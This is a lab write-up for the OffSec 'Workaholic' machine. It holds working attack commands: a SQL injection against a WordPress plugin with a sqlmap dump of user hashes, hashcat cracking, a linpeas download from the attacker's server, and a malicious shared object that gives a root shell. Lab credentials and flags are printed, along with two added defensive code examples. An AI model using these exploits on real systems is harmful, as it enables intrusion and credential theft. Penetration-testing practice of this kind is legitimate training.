Summary #
To get initial access to the target we can either use the OFFSEC provided credentials with SSH, or scan the WordPress site on port 80 for vulnerable plugins using wpprobe. There is one plugin named wp-advanced-search which has an unauthenticated SQL injection vulnerability (CVE-2024-9796). Exploiting this vulnerability with sqlmap gives us a number of users and hashes. Cracking these with hashcat gives credentials for the charlie and ted users. With the ted user we can log into the FTP service and get another password that is the same as the one provided by OFFSEC. So we log in to the target as charlie over SSH. Abusing a SUID binary /var/www/html/wordpress/blog/wp-monitor with our own shared object as the ted user allows us to escalate our privileges to root.
Specifications #
- Name: WORKAHOLIC
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- OS: Linux workaholic 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.134.229
- OFFSEC provided credentials: charlie:rU)tJnTw5*ShDt4nOx
- HASH: local.txt:1b340789a85268c76fe00d5c5f845411
- HASH: proof.txt:db0c9b31c34c3aef9e449c30ca3e2028
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir workaholic && cd workaholic && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 16 18:53 .
drwxrwxr-x 29 kali kali 4096 Aug 16 18:53 ..
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 enum
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 exploits
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 files
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 tools
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 uploads
## set bash variable
ip=192.168.134.229
## ping target to check if it's online
ping $ip
PING 192.168.134.229 (192.168.134.229) 56(84) bytes of data.
64 bytes from 192.168.134.229: icmp_seq=1 ttl=61 time=16.8 ms
64 bytes from 192.168.134.229: icmp_seq=2 ttl=61 time=17.1 ms
^C
--- 192.168.134.229 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 16.825/16.947/17.069/0.122 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.134.229:21
Open 192.168.134.229:22
Open 192.168.134.229:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 18:57 CEST
Initiating Ping Scan at 18:57
Scanning 192.168.134.229 [4 ports]
Completed Ping Scan at 18:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:57
Completed Parallel DNS resolution of 1 host. at 18:57, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:57
Scanning 192.168.134.229 [3 ports]
Discovered open port 21/tcp on 192.168.134.229
Discovered open port 80/tcp on 192.168.134.229
Discovered open port 22/tcp on 192.168.134.229
Completed SYN Stealth Scan at 18:57, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.134.229
Host is up, received echo-reply ttl 61 (0.018s latency).
Scanned at 2025-08-16 18:57:30 CEST for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 61
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)
Copy the output of open ports into a file called ports within the files directory.
## edit the `files/ports` file
nano files/ports
## content of the `ports` file:
21/tcp open ftp syn-ack ttl 61
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
21,22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 21,22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
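The pipeline above turns the `ports` file into the comma-separated list nmap wants with cut, awk and sed. As an added example, not part of the original write-up, here is the same conversion in Python, generalized a little: it also accepts raw rustscan or nmap output, only counts lines whose state is exactly `open` (so `open|filtered` from a UDP scan is ignored), removes duplicates and sorts the result. `SAMPLE_PORTS_FILE` is a constructed copy of the three lines from `files/ports`.

```python
import re
import sys

# Constructed copy of the three lines the write-up pastes into files/ports.
SAMPLE_PORTS_FILE = """\
21/tcp open ftp syn-ack ttl 61
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
"""

# A port line: "<port>/<proto> open ..." with the state exactly "open"
# (so "open|filtered" from a UDP scan is not picked up).
PORT_LINE = re.compile(r"^\s*(\d{1,5})/(tcp|udp)\s+open(?:\s|$)")


def open_ports(text):
    """Sorted, de-duplicated list of open port numbers found in the text.
    Headers, banners and blank lines simply do not match and are skipped,
    so raw rustscan/nmap output works as well as the hand-copied file."""
    found = set()
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            found.add(int(m.group(1)))
    return sorted(found)


def ports_csv(text):
    """The comma-separated form nmap's -p option wants, no trailing comma."""
    return ",".join(str(p) for p in open_ports(text))


if __name__ == "__main__":
    # Usage: python3 ports.py < files/ports   (falls back to the sample)
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PORTS_FILE
    print(ports_csv(data))
```

Feeding it `enum/rustscan` directly gives the same `21,22,80`, so the intermediate `ports` file becomes optional.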
Output of NMAP:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
| 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp open http syn-ack ttl 61 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Workaholic
|_http-generator: WordPress 6.7.2
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 6BD852FF8C391FD56DF5A8EF4C2DB7FC
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
| 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp open http syn-ack ttl 61 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Workaholic
|_http-generator: WordPress 6.7.2
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 6BD852FF8C391FD56DF5A8EF4C2DB7FC
Initial Access: path 1 #
Because OFFSEC provided the credentials charlie:rU)tJnTw5*ShDt4nOx we can SSH to the target to get initial access as the charlie user in the /home/charlie directory, find local.txt and print it.
ssh charlie@$ip
charlie@192.168.134.229's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Aug 16 07:21:21 PM UTC 2025
System load: 0.0 Processes: 159
Usage of /: 63.1% of 9.75GB Users logged in: 0
Memory usage: 35% IPv4 address for ens192: 192.168.134.229
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
204 updates can be applied immediately.
144 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Aug 16 19:11:07 2025 from 192.168.45.204
$
## print the current working directory
$ pwd
/home/charlie
## print `local.txt`
$ cat local.txt
1b340789a85268c76fe00d5c5f845411
Initial Access: path 2 #
On port 80 there is a WordPress site running, so let’s check it out in the browser. When you hover over the Workaholic title you see the hostname workaholic.offsec. So let’s add this to the /etc/hosts file.
## use nano to edit the `/etc/hosts` file
sudo nano /etc/hosts
## add this entry and save the file
192.168.134.229 workaholic.offsec
Now, run wpprobe (https://github.com/Chocapikk/wpprobe) and see what’s running and installed on the WordPress site.
## run wpprobe using docker
docker run -it --rm wpprobe scan --url http://$ip
__ __ ___ ___ _
/ / /\ \ \/ _ \/ _ \_ __ ___ | |__ ___
\ \/ \/ / /_)/ /_)/ '__/ _ \| '_ \ / _ \
\ /\ / ___/ ___/| | | (_) | |_) | __/
\/ \/\/ \/ |_| \___/|_.__/ \___|
v0.8.0 [latest]
Stealthy WordPress Plugin Scanner - By @Chocapikk
18:15:03 [INFO] No proxy URL provided, checking environment variables
18:15:03 [INFO] No proxy configured; using direct connection
╭──────────────────────────────────────────────────────────────────────────╮
│ 🔎 http://192.168.134.229 (Critical: 0 | High: 0 | Medium: 0 | Low: 0) │
│ └── wp-advanced-search (unknown) [50.00% confidence] │
╰──────────────────────────────────────────────────────────────────────────╯
The wp-advanced-search plugin is installed on the target. Searching the internet we can find an unauthenticated SQL injection exploit (CVE-2024-9796) with this PoC: https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/. Running this on our target shows three users are defined. Now run sqlmap to dump the wp_users table out of WordPress. Save the hashes in a file called hash and try to crack them using hashcat.
## run a test with the exploit
curl "http://$ip/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
admin
charlie
ted
## dump wp_users using `sqlmap`
sqlmap -u "http://$ip/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e" --is-dba -T wp_users --dump
<SNIP>
[3 entries]
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://workaholic.offsec | $P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn. | admin@offsec.com | admin | 0 | admin | admin | 2025-03-27 11:15:16 | <blank> |
| 2 | <blank> | $P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p. | charlie@offsec.com | charlie | 0 | charlie | charlie | 2025-03-27 11:15:17 | <blank> |
| 3 | <blank> | $P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/ | ted@offsec.com | ted | 0 | ted | ted | 2025-03-27 11:15:17 | <blank> |
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
<SNIP>
## create a file called `hash` with the following hashes as content
nano hash
## content of the `hash` file:
$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/
## use hashcat to try to crack the hashes using the `rockyou.txt`
hashcat -m 400 hash /opt/rockyou.txt
<SNIP>
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.:chrish20
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/:okadamat17
<SNIP>
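The endpoint abused above takes the table (`t`) and field (`f`) names straight from the request, which is why a value like `wp_users --` redirects the query to the users table and comments out the rest of the statement. As an added example, not code from the plugin or from this write-up, here is that bug class reproduced against a constructed in-memory SQLite database next to the hardened form: identifiers come only from an allowlist, the search value is a bound parameter and LIKE wildcards are escaped. `build_db`, the table rows and the `$P$PLACEHOLDER_HASH_*` values are made up for the demonstration.

```python
import sqlite3

# Constructed in-memory stand-in for the WordPress database: a searchable
# posts table and the sensitive wp_users table that autocompletion should
# never touch. Rows and hashes are made-up placeholders, not target data.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_posts (ID INTEGER, post_title TEXT);
        INSERT INTO wp_posts VALUES (1, 'admin tips'), (2, 'holiday post');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES
            (1, 'admin',   '$P$PLACEHOLDER_HASH_1'),
            (2, 'charlie', '$P$PLACEHOLDER_HASH_2');
    """)
    return db


def autocomplete_vulnerable(db, q, t, f):
    """The bug class the write-up exploits: table and field names arrive
    from the request and are pasted into the SQL text. With t = 'wp_users --'
    everything after the table name becomes a comment."""
    sql = f"SELECT {f} FROM {t} WHERE {f} LIKE '{q}%'"
    return [row[0] for row in db.execute(sql)]


# Allowlist of table -> searchable columns. Identifiers cannot be bound as
# parameters, so this mapping is the only source they may come from.
SEARCHABLE = {"wp_posts": {"post_title"}}


def escape_like(value, esc="!"):
    """Escape LIKE wildcards so a user-supplied '%' or '_' matches literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def autocomplete_hardened(db, q, t, f):
    """Reject any table/field pair that is not on the allowlist, quote the
    allowlisted identifiers, and bind the search value as a parameter."""
    if t not in SEARCHABLE or f not in SEARCHABLE[t]:
        raise ValueError(f"{t}.{f} is not searchable")
    sql = f'SELECT "{f}" FROM "{t}" WHERE "{f}" LIKE ? ESCAPE \'!\' LIMIT 20'
    return [row[0] for row in db.execute(sql, (escape_like(q) + "%",))]


if __name__ == "__main__":
    db = build_db()
    print(autocomplete_vulnerable(db, "admin", "wp_users --", "user_login"))
    try:
        autocomplete_hardened(db, "admin", "wp_users --", "user_login")
    except ValueError as err:
        print("rejected:", err)
    print(autocomplete_hardened(db, "admin", "wp_posts", "post_title"))
```

The allowlist is the important part: quoting or escaping an identifier does not help when the attacker gets to choose which table is queried, so the table and column must be looked up, never passed through.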
Hashcat cracked 2 out of 3 hashes: charlie:chrish20 and ted:okadamat17. Using these credentials to log in at http://workaholic.offsec/wp-admin shows that they are regular users, so no easy initial access that way. Let’s try these credentials on FTP instead. The ted user can access the FTP service and download wp-config.php. This gives us a password for the database: wpadmin:rU)tJnTw5*ShDt4nOx.
## connect as `ted` to FTP
ftp ted@$ip
Connected to 192.168.134.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
## set passive mode off
ftp> passive
Passive mode: off; fallback to active mode: off.
## print content directory
ftp> dir
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxr-xr-x 1 1002 1002 405 Mar 27 11:15 index.php
-rwxr-xr-x 1 1002 1002 19915 Mar 27 11:15 license.txt
-rwxr-xr-x 1 1002 1002 7409 Mar 27 11:15 readme.html
-rwxr-xr-x 1 1002 1002 7387 Mar 27 11:15 wp-activate.php
drwxr-xr-x 9 1002 1002 4096 Mar 27 11:15 wp-admin
-rwxr-xr-x 1 1002 1002 351 Mar 27 11:15 wp-blog-header.php
-rwxr-xr-x 1 1002 1002 2323 Mar 27 11:15 wp-comments-post.php
-rwxr-xr-x 1 1002 1002 3336 Mar 27 11:15 wp-config-sample.php
-rwxr-xr-x 1 1002 1002 3178 Mar 27 11:15 wp-config.php
drwxr-xr-x 5 1002 1002 4096 Mar 27 11:15 wp-content
-rwxr-xr-x 1 1002 1002 5617 Mar 27 11:15 wp-cron.php
drwxr-xr-x 30 1002 1002 12288 Mar 27 11:15 wp-includes
-rwxr-xr-x 1 1002 1002 2502 Mar 27 11:15 wp-links-opml.php
-rwxr-xr-x 1 1002 1002 3937 Mar 27 11:15 wp-load.php
-rwxr-xr-x 1 1002 1002 51367 Mar 27 11:15 wp-login.php
-rwxr-xr-x 1 1002 1002 8543 Mar 27 11:15 wp-mail.php
-rwxr-xr-x 1 1002 1002 29032 Mar 27 11:15 wp-settings.php
-rwxr-xr-x 1 1002 1002 34385 Mar 27 11:15 wp-signup.php
-rwxr-xr-x 1 1002 1002 5102 Mar 27 11:15 wp-trackback.php
-rwxr-xr-x 1 1002 1002 3246 Mar 27 11:15 xmlrpc.php
226 Directory send OK.
## download `wp-config.php`
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for wp-config.php (3178 bytes).
100% |******************************************************************************************| 3178 2.98 MiB/s 00:00 ETA
226 Transfer complete.
3178 bytes received in 00:00 (157.96 KiB/s)
## quit FTP service
ftp> quit
221 Goodbye.
## print `wp-config.php`
<SNIP>
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'rU)tJnTw5*ShDt4nOx' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
<SNIP>
This password is the same as the OFFSEC provided credential for the charlie user. Using SSH we can indeed log in to the target, get initial access in the /home/charlie directory and print local.txt.
ssh charlie@$ip
charlie@192.168.134.229's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Aug 16 07:11:07 PM UTC 2025
System load: 0.0 Processes: 160
Usage of /: 63.1% of 9.75GB Users logged in: 0
Memory usage: 35% IPv4 address for ens192: 192.168.134.229
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
204 updates can be applied immediately.
144 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$
## print the current working directory
$ pwd
/home/charlie
## print `local.txt`
$ cat local.txt
1b340789a85268c76fe00d5c5f845411
Privilege Escalation #
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.204/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::49e8:fd58:a665:308/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## download `linpeas.sh`
$ wget http://192.168.45.204/linpeas.sh
--2025-08-16 19:24:17-- http://192.168.45.204/linpeas.sh
Connecting to 192.168.45.204:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[============================================================>] 933.76K 5.42MB/s in 0.2s
2025-08-16 19:24:17 (5.42 MB/s) - ‘linpeas.sh’ saved [956174/956174]
## set the execution bit
$ chmod +x linpeas.sh
## run `linpeas.sh`
$ ./linpeas.sh
The linpeas.sh output shows an unknown binary with the SUID bit set: /var/www/html/wordpress/blog/wp-monitor. We can verify this with the find command.
## list all binaries with SUID bit set
$ find / -perm /4000 -ls 2>/dev/null
1121 272 -rwsr-xr-x 1 root root 277936 Apr 8 2024 /usr/bin/sudo
12760 40 -rwsr-xr-x 1 root root 40664 May 30 2024 /usr/bin/newgrp
682 40 -rwsr-xr-x 1 root root 39296 Dec 5 2024 /usr/bin/umount
668 52 -rwsr-xr-x 1 root root 51584 Dec 5 2024 /usr/bin/mount
295 64 -rwsr-xr-x 1 root root 64152 May 30 2024 /usr/bin/passwd
291 72 -rwsr-xr-x 1 root root 72792 May 30 2024 /usr/bin/chfn
30388 56 -rwsr-xr-x 1 root root 55680 Dec 5 2024 /usr/bin/su
294 76 -rwsr-xr-x 1 root root 76248 May 30 2024 /usr/bin/gpasswd
292 44 -rwsr-xr-x 1 root root 44760 May 30 2024 /usr/bin/chsh
674 40 -rwsr-xr-x 1 root root 39296 Apr 8 2024 /usr/bin/fusermount3
18890 336 -rwsr-xr-x 1 root root 342632 Feb 24 21:25 /usr/lib/openssh/ssh-keysign
2856 20 -rwsr-xr-x 1 root root 18736 Dec 2 2024 /usr/lib/polkit-1/polkit-agent-helper-1
2972 160 -rwsr-xr-x 1 root root 163112 Jan 15 2025 /usr/lib/snapd/snap-confine
1402 36 -rwsr-xr-- 1 root messagebus 34960 Aug 9 2024 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
524321 20 -rwsr-xr-x 1 root root 16728 Mar 27 11:15 /var/www/html/wordpress/blog/wp-monitor
When we run this binary it says it’s checking the logs. Using strace on the binary we can check whether it is vulnerable to shared object injection, and it is: the binary searches for /home/ted/.lib/libsecurity.so, which does not exist yet. We need to switch user to ted (ted:okadamat17) and create it. First, check if we have a compiler on the target. We do, so now create a .c file which should drop us a root shell.
## running the binary
$ /var/www/html/wordpress/blog/wp-monitor
[+] Checking the logs...
[!] This can take a while...
## use `strace` on the binary
$ strace /var/www/html/wordpress/blog/wp-monitor 2>&1 | grep -iE "open|access|no such file"
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/var/log/nginx/access.log", O_RDONLY) = -1 EACCES (Permission denied)
write(2, "Error opening log file: Permissi"..., 42Error opening log file: Permission denied
openat(AT_FDCWD, "/home/ted/.lib/libsecurity.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
## check if the gcc compiler is present on the target
$ which gcc
/usr/bin/gcc
## switch user to `ted`
su ted
## create the `.lib` directory
mkdir /home/ted/.lib
## change directory
cd /home/ted/.lib
## create the `libsecurity.c` file
nano libsecurity.c
## file content
// libsecurity.c
#include <stdio.h>
#include <stdlib.h>

void init_plugin() {
    system("/bin/bash");
}
## compile the .c file to a shared object
gcc -shared -o /home/ted/.lib/libsecurity.so -fPIC /home/ted/.lib/libsecurity.c
## when we run the `/var/www/html/wordpress/blog/wp-monitor` it should give us a shell as the `root` user
$ /var/www/html/wordpress/blog/wp-monitor
[+] Checking the logs...
root@workaholic:/home/ted/.lib#
## print `proof.txt`
root@workaholic:/home/ted/.lib# cat /root/proof.txt
db0c9b31c34c3aef9e449c30ca3e2028